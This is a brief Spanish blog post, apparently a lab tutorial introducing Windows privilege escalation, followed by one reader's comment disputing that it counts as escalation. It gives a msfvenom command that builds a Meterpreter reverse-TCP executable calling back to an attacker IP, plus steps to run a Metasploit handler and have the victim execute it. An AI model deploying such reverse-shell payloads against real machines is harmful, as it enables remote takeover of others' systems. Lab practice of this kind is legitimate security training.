Para estas entradas necesitaremos un Windows (el que quieran o tengan a mano) con dos o más usuarios creados, uno de ellos con privilegios de administrador y una máquina atacante que en mi caso utilizaré Debian + Katoolin.

msfvenom -p windows/metertpreter/reverse_tcp LPORT={puerto}
LHOST={Dirección ip atacante} -f exe > shell.exe
Luego levantan un handler en Metasploit con el mismo Payload, pasan el .EXE a la víctima y ejecutan. De esa manera obtendrán sesión en el Meterpreter.
- Escalando privilegios en windows con exploits
- Escalando privilegios en windows sin exploits
- Aquí un video y el sitio de Pentestmonkey que son los que desarrollaron la tool.
Fuente: SniferL4bs
Esto no es escalar privilegios, es solo correr un programa como admin...
ResponderBorrar